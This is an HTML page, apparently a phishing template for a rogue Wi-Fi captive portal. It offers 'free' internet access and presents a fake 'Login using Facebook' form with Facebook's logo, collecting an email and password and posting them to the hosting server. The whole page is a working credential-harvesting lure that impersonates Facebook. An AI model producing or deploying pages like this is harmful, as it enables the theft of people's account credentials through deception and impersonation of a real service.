<!DOCTYPE html>
<html >
  <head>
    <meta charset="UTF-8">
    <title>Wi-Fi Service</title>
    <link rel="stylesheet" href="/static/css/reset.css">
    <link rel='stylesheet prefetch' href='/static/css/roboto.css'>
    <link rel='stylesheet prefetch' href='/static/css/font-awesome.min.css'>
    <link rel="stylesheet" href="/static/css/style.css">    
  </head>
  <body> 
<!-- Form Mixin-->
<!-- Input Mixin-->
<!-- Button Mixin-->
<!-- Pen Title-->
<div class="pen-title">
  <h1>Get connected to the Internet for free</h1>
</div>
<!-- Form Module-->
<div class="module form-module">
  <div class="form">
  </div>
  <div class="form">
    <h2>Login using Facebook</h2>
    <img src="/static/logos/facebook-logo.png" width="25%" class="logo"></img>
    <form name="theform" class="theform" method="post" action="/" >
      <input type="text" placeholder="Email" name="login"/>
      <input type="password" placeholder="Password" name="password"/>
      <button class="login-btn">Login</button>
    </form> 
  </div>
  <div class="cta"><a id="btn1">Terms of Usage</a></div>
</div>
    <script src='/static/js/jquery.min.js'></script>
    <script src="/static/js/index.js"></script> 
  </body>
</html>
